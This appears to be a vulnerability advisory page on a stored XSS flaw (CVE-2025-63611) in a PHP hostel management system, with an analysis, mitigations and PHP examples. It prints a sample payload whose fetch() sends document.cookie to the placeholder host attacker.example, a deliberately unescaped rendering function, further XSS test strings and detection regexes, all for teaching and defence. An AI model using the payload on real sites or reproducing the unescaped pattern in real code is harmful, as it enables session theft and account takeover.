CVE-2025-63611: n/a
CVE-2025-63611 is a high-severity stored Cross-Site Scripting (XSS) vulnerability in phpgurukul Hostel Management System v2.1. The issue arises from improper sanitization of user input in the complaint submission form, specifically the 'Explain the Complaint' field. Malicious HTML or JavaScript submitted by a user is stored and later executed in the administrator's browser when the complaint details are viewed. Exploitation requires an authenticated user to submit a crafted complaint and an administrator to open the complaint details page, resulting in potential compromise of the admin session's confidentiality and integrity. The vulnerability does not affect availability, but script running in the admin's browser can perform any action the admin interface allows, which amounts to privilege escalation from an ordinary user account. No public exploits are currently known; the assessed CVSS score is 8.7, indicating high risk. European organizations using this system should prioritize patching or mitigating this flaw to protect administrative accounts and sensitive data.
AI Analysis
Technical Summary
CVE-2025-63611 is a stored Cross-Site Scripting (XSS) vulnerability affecting phpgurukul Hostel Management System version 2.1. The vulnerability exists because the application fails to escape user-supplied input from the complaint submission form, specifically the 'Explain the Complaint' field submitted via /register-complaint.php. When a user submits a complaint containing HTML or JavaScript, the text is stored in the backend database as-is. Later, when an administrator opens the complaint details page (/admin/complaint-details.php?cid=<id>), the stored text is written into the page without output encoding, so the browser parses the markup and executes the script in the administrator's session context. This gives the attacker arbitrary script execution with the privileges of the admin user, potentially leading to session hijacking, credential theft, or unauthorized administrative actions performed silently on the admin's behalf. The attack requires an authenticated user to submit the malicious complaint and an administrator to view it, which limits the attack scope but does not make it small: any hostel resident account, including a compromised one, is a sufficient starting point. The CVE record itself carries no CVSS vector (see Technical Details); the assessed CVSS 3.1 base score is 8.7 (AV:N/AC:L/PR:L/UI:R/S:C/C:H/I:H/A:N), reflecting network attack vector, low attack complexity, low privileges required, user interaction required, a scope change from the submitting user's context to the administrator's, and high impact on confidentiality and integrity with no availability impact. No patches or public exploits are currently available, but the vulnerability is publicly disclosed and should be addressed promptly. The root cause is a classic CWE-79 (Improper Neutralization of Input During Web Page Generation) issue: the missing control is HTML encoding at the point of output, not input filtering.
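The pattern the analysis describes, written out as an added illustration. This is not code from phpgurukul Hostel Management System: the `$row` array, the `description` column name, the `e()` helper and the payload string are assumptions made for the example. The vulnerable function interpolates the stored complaint text straight into HTML; the hardened one passes it through `htmlspecialchars()` at the output sink.

```php
<?php
// Added illustration of the CWE-79 pattern described above. Not the
// project's code: $row and the column name 'description' are assumptions.
declare(strict_types=1);

// Constructed sample of what an attacker can store via the complaint form.
// The application stores it as-is; the defect is on the rendering side.
// attacker.example is a placeholder host, not a real indicator.
const CONSTRUCTED_PAYLOAD = '<img src=x onerror="fetch(\'https://attacker.example/?c=\'+document.cookie)">';

// Vulnerable rendering: the stored text is interpolated into HTML unchanged,
// so the browser parses the tag and runs the handler in the admin's session.
function renderComplaintVulnerable(array $row): string
{
    return '<td>' . $row['description'] . '</td>';
}

// Output-encoding helper. ENT_QUOTES also encodes the single quote so the
// value is safe inside quoted attributes; ENT_SUBSTITUTE avoids returning ''
// on invalid UTF-8 (which would silently blank the field instead of failing).
function e(?string $value): string
{
    return htmlspecialchars((string) $value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Hardened rendering: same markup, but user data passes through e() at the
// HTML text-node sink. Encoding at output is what fixes CWE-79; input
// filtering alone is bypassable and breaks legitimate text such as "a < b".
function renderComplaintHardened(array $row): string
{
    return '<td>' . e($row['description']) . '</td>';
}

// Self-check: after stripping the <td> wrapper we added ourselves, the
// hardened output must contain no unencoded angle brackets at all.
function hardenedOutputIsInert(string $rendered): bool
{
    $inner = substr($rendered, strlen('<td>'), -strlen('</td>'));
    return strpos($inner, '<') === false && strpos($inner, '>') === false;
}

$row = ['cid' => 1, 'description' => CONSTRUCTED_PAYLOAD];
echo "vulnerable: " . renderComplaintVulnerable($row) . "\n";
echo "hardened:   " . renderComplaintHardened($row) . "\n";
echo "hardened output inert: " . var_export(hardenedOutputIsInert(renderComplaintHardened($row)), true) . "\n";
```

Run it with `php example.php`. The vulnerable line echoes the `<img ... onerror=...>` tag intact; the hardened line shows `&lt;img src=x onerror=&quot;...` and the self-check reports `true`. Note that `e()` is correct only for the HTML text and attribute-value contexts; a value placed inside a `<script>` block or a URL needs a different encoder.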
Potential Impact
For European organizations using phpgurukul Hostel Management System v2.1, this vulnerability poses a significant risk to administrative account security and the integrity of complaint management data. Successful exploitation can lead to theft of administrator session cookies, enabling attackers to impersonate admins and perform unauthorized actions such as modifying complaint records, accessing sensitive resident data, or creating further privileged access within the system. Even with cookie theft blocked, script running in the admin's browser can issue authenticated requests to the admin interface directly. This can result in data breaches, loss of trust, and potential regulatory non-compliance under GDPR due to exposure of personal data. Although availability is not directly impacted, the compromise of administrative functions can disrupt operational workflows and incident response capabilities. Because the administrative interface is the target, organizations with centralized hostel or accommodation management relying on this system are particularly exposed. The requirement for an authenticated user to submit malicious input limits exposure, but insider threats or compromised resident accounts increase the risk. The lack of known exploits in the wild suggests a window for proactive mitigation before widespread attacks occur.
Mitigation Recommendations
To mitigate CVE-2025-63611, organizations should layer the following controls:
1) Apply vendor patches or updates as soon as they become available to fix the output encoding flaw.
2) Until a patch exists, deploy web application firewall (WAF) rules that flag or block script-like payloads (tags, event-handler attributes, javascript: URLs) in POST bodies to /register-complaint.php. Treat this as a stopgap: WAF signatures are routinely bypassed with encoding tricks.
3) Apply input validation on the 'Explain the Complaint' field (length limits, rejection of obvious markup) as defense in depth, but do not rely on it. Free-text fields legitimately contain characters such as '<' and '&', and stripping them is both lossy and bypassable.
4) Fix the root cause by HTML-entity-encoding the stored text at every point where it is rendered in the admin interface (in PHP, htmlspecialchars() with ENT_QUOTES and an explicit UTF-8 charset). Output encoding is the control that actually neutralizes CWE-79.
5) Limit administrative access to trusted networks and require multi-factor authentication. MFA does not protect a session cookie that has already been stolen, so also mark the admin session cookie HttpOnly and Secure, keep admin sessions short, and invalidate them on logout.
6) Monitor for complaint submissions containing markup or script, and for admin views of complaint details followed by unexpected administrative actions or outbound requests to unknown hosts. Sweep existing complaint records for stored payloads: encoding at output makes them inert, but the submitting account is still a lead for incident response.
7) Educate administrators to be cautious when opening complaint details from untrusted or newly created accounts.
8) Add a Content Security Policy on the admin interface that disallows inline scripts (for example script-src 'self' without 'unsafe-inline'), so that an encoding miss elsewhere does not become script execution.
These targeted mitigations reduce the attack surface and protect sensitive administrative functions.
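An added example for the monitoring, session-cookie and CSP items above. It is not project code: the row shape (`cid`, `userid`, `description`), the sample complaints and the regular expressions are constructed for the example, and the security headers are a generic hardened baseline rather than anything the vendor ships. The triage function runs over rows that would come from a SELECT on the complaints table and returns the complaints whose free text contains markup, together with the submitting user id.

```php
<?php
// Added example for the mitigation list above. Not project code: the
// column names, sample rows and patterns are assumptions.
declare(strict_types=1);

// Indicators of HTML/script in a free-text field that should never contain
// markup. Deliberately broad: this is for triage of stored data, not a WAF rule.
const MARKUP_PATTERNS = [
    '/<\s*\/?\s*[a-z][^>]*>/i',   // any HTML tag (requires a letter after '<', so "2 < 3" does not match)
    '/\bon[a-z]+\s*=/i',          // inline event handler such as onerror= or onload=
    '/javascript\s*:/i',          // javascript: URL scheme
    '/&#x?[0-9a-f]+;/i',          // numeric entities used to disguise the above
];

// Returns the complaints whose description matches a markup pattern, with the
// submitting user id so an investigator can pivot to the account.
function findSuspiciousComplaints(array $rows): array
{
    $hits = [];
    foreach ($rows as $row) {
        foreach (MARKUP_PATTERNS as $re) {
            if (preg_match($re, $row['description']) === 1) {
                $hits[] = ['cid' => $row['cid'], 'userid' => $row['userid'], 'pattern' => $re];
                break; // one hit per complaint is enough for triage
            }
        }
    }
    return $hits;
}

// Response headers for the admin pages. With script-src 'self' and no
// 'unsafe-inline', an injected <script> block or onerror= handler is refused
// by the browser even if output encoding is missed somewhere.
function adminSecurityHeaders(): array
{
    return [
        'Content-Security-Policy' => "default-src 'self'; script-src 'self'; object-src 'none'; base-uri 'self'; frame-ancestors 'none'",
        'X-Content-Type-Options'  => 'nosniff',
    ];
}

// Session cookie settings that blunt the cookie-theft outcome: HttpOnly keeps
// document.cookie from returning the session id. Must run before session_start().
function hardenSessionCookie(): void
{
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => true,
        'samesite' => 'Strict',
    ]);
}

// Constructed sample rows standing in for the result of a SELECT over the
// complaints table. Row 13 is a deliberate near-miss: a bare '<' in prose.
$sampleRows = [
    ['cid' => 11, 'userid' => 3, 'description' => 'Water heater in block B has not worked since Monday.'],
    ['cid' => 12, 'userid' => 7, 'description' => '<img src=x onerror=alert(document.cookie)>'],
    ['cid' => 13, 'userid' => 3, 'description' => 'Room 204: window latch broken, 2 < 3 complaints this week'],
    ['cid' => 14, 'userid' => 9, 'description' => 'click <a href="javascript:alert(1)">here</a>'],
];

foreach (findSuspiciousComplaints($sampleRows) as $hit) {
    printf("cid=%d userid=%d matched %s\n", $hit['cid'], $hit['userid'], $hit['pattern']);
}

foreach (adminSecurityHeaders() as $name => $value) {
    printf("%s: %s\n", $name, $value);
}
```

Against the sample rows the script reports cids 12 and 14 and leaves 11 and 13 alone. In a real deployment, send the headers from `adminSecurityHeaders()` with `header()` on every admin page and call `hardenSessionCookie()` before the session is started; the CSP will also block any legitimate inline scripts the admin pages currently use, so test it in report-only mode first.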
Affected Countries
Germany, France, United Kingdom, Italy, Spain, Netherlands, Poland, Belgium
Technical Details
- Data Version: 5.2
- Assigner Short Name: mitre
- Date Reserved: 2025-10-27T00:00:00.000Z
- CVSS Version: null (the CVE record carries no CVSS vector)
- State: PUBLISHED
Threat ID: 695fd2d12717593a3341ed56
Added to database: 1/8/2026, 3:52:49 PM
Last enriched: 1/15/2026, 5:17:03 PM
Last updated: 2/7/2026, 1:59:26 AM